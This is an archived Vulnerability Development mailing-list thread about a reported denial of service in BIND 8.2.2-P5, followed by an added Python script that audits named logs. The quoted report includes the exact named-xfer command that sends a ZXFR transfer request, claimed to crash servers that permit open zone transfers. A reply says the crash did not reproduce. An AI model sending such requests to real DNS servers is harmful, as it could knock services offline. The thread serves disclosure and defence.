Vulnerability Development mailing list archives

Re: Possible DOS in Bind 8.2.2-P5


From: fire-eyes <sgtphou () FIRE-EYES YI ORG>
Date: Fri, 10 Nov 2000 19:17:04 -0500

"Fabio Pietrosanti (naif)" wrote:

Hi,
playing with bind and the ZXFR feature (zone transfer compressed with a possibly insecure
execlp("gzip", "gzip", NULL);), I discovered a Denial Of Service against Bind 8.2.2-P5.

By default Bind 8.2.2-P5 is not compiled with ZXFR support unless you define it with #define BIND_ZXFR
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what happens? Look here...

################################
zone to transfer: zone.pippo.com
dns server:       dns.pippo.com 192.168.1.1
me:               naif.gatesux.com 10.10.10.10
I send a Zone Transfer request using the "-Z" switch, which means that I wish to use ZXFR.
dns.pippo.com doesn't support ZXFR and has "allow-transfer{}" not configured, so everyone
could ask it for *.zone.pippo.com ...

<naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"

On the server's log:
Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284

Then the server "*** CRASHED ***" .

I should assume that bind 8.2.2-P5 is vulnerable (Please someone test and confirm this kind of DoS)
and bind-9.0.0 has no support for ZXFR.

<naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
    234
<naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
      0

A lot of DNS servers are misconfigured and allow zone transfers to anyone, so they are DoSable...

naif
naif () itapac net

I tried this on my bind 8.2.2-P5 on slackware linux 7.0.0 kernel 2.2.17
Intel p200 128M ram.

I tried this in two situations:

        a) named started as 'named -u nobody'
          1> This results in named being run as user nobody

        b) named started as 'ndc start'
          1> This results in named running as root, of course.

In neither of these situations did I find any problems after 10 minutes.

If you have other ways you would like me to try running the daemon, let
me know.

Also, I am rather new at bind. How might I go about denying *XFR's from
all but approved hosts?

Thank You

Joseph
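
Added example, not part of either poster's message: a small audit over named's syslog output, in the format quoted in the thread, that flags zone transfers approved for hosts outside a list of known secondaries and any "unsupported XFR" request. The function name audit_transfers, the secondary address 192.168.1.2 and the third sample line are assumptions constructed for illustration.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample input: the first two lines follow the log excerpt in the
# thread, the third is an invented transfer to a hypothetical secondary.
SAMPLE_LOG = """\
Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
Nov  7 11:25:41 dns.pippo.com: named[188510]: approved AXFR from [192.168.1.2].1045 for "zone.pippo.com"
"""

APPROVED = re.compile(
    r'named\[\d+\]: approved (\w*XFR) from \[([\d.]+)\]\.\d+ for "([^"]+)"')
UNSUPPORTED = re.compile(
    r'named\[\d+\]: unsupported XFR \(type (\w+)\) of "([^"]+)" \(\w+\) to \[([\d.]+)\]\.\d+')


def audit_transfers(log_text, allowed_nets):
    """Return findings as (kind, xfr_type, source_ip, zone) tuples.

    allowed_nets lists the addresses or CIDR ranges of the secondaries that
    are expected to transfer zones from this server.
    """
    nets = [ip_network(n) for n in allowed_nets]
    findings = []
    for line in log_text.splitlines():
        m = APPROVED.search(line)
        if m:
            xfr_type, src, zone = m.groups()
            # A transfer approved for a host outside the list means
            # allow-transfer is missing or wider than intended.
            if not any(ip_address(src) in net for net in nets):
                findings.append(("unexpected-transfer-approved", xfr_type, src, zone))
            continue
        m = UNSUPPORTED.search(line)
        if m:
            xfr_type, zone, src = m.groups()
            # The request type this thread reports as preceding the crash.
            findings.append(("unsupported-xfr-request", xfr_type, src, zone))
    return findings


if __name__ == "__main__":
    for finding in audit_transfers(SAMPLE_LOG, ["192.168.1.2"]):
        print(*finding)
```

Any "unexpected-transfer-approved" finding points at a zone whose allow-transfer list should be restricted to the known secondaries.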

